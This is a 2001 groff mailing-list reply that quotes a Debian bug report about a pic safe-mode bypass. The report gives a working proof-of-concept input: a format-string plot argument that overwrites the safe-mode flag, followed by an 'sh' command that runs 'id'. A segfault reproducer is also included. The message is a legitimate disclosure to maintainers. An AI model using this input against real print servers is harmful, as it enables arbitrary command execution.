[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Groff] Re: Bug#107459: pic can be forced to run commands in safe mode
From: |
Colin Watson |
Subject: |
[Groff] Re: Bug#107459: pic can be forced to run commands in safe mode |
Date: |
Thu, 2 Aug 2001 12:38:57 +0100 |
User-agent: |
Mutt/1.2.5i |
On Thu, Aug 02, 2001 at 11:36:37AM +0200, Arnaud Giersch wrote:
> Package: groff
> Version: 1.15.2-1
>
> pic can be forced to execute commands (sh X..X) when running in safe
> mode (-S). It can be exploited trough lpd when groff/pic is run in
> print filters, and arbitrary commands with id of lpd can be run.
>
> pic command 'plot -1.99854281554743185012 "%n"' will overwrite memory
> where safe mode variable is stored and then it alows to use "sh"
> command.
>
> How to reproduce:
>
> pic -S > /dev/null << EOT
> .PS
> plot -1.99854281554743185012 "%n"
> sh Xid >&2X
> .PE
> EOT
>
> Actual Results: uid=1000(giersch) gid=300(parallel) ...
>
> Expected Results: pic:<standard input>:3: unsafe to run command `id >&2'
>
> Bug has been discovered by Zenith Parsec <address@hidden>. Exploit
> with patch has been posted to bugtraq:
> http://www.securityfocus.com/bid/3103
>
> I've made an patched version for the Potato (groff_1.15.2-1.ag)
> available at:
> http://arnaud.giersch.free.fr/debian/
>
> As far as I can see in the sources, the other versions (Woody and Sid)
> are vulnerable too.
Hi,
Are you aware of this problem? I haven't seen any traffic about it here.
Although I haven't yet managed to overwrite the correct bit of memory to
make the exploit work, I've got pic 1.17.2 to segfault by varying plot's
first argument, which is a good indication that something's wrong. The
relevant code in 1.15.2 and 1.17.2 seems largely identical.
At the very least, this should reliably segfault:
$ pic -S >/dev/null
.PS
plot 0 "%n"
Thanks,
--
Colin Watson address@hidden
- [Groff] Re: Bug#107459: pic can be forced to run commands in safe mode,
Colin Watson <=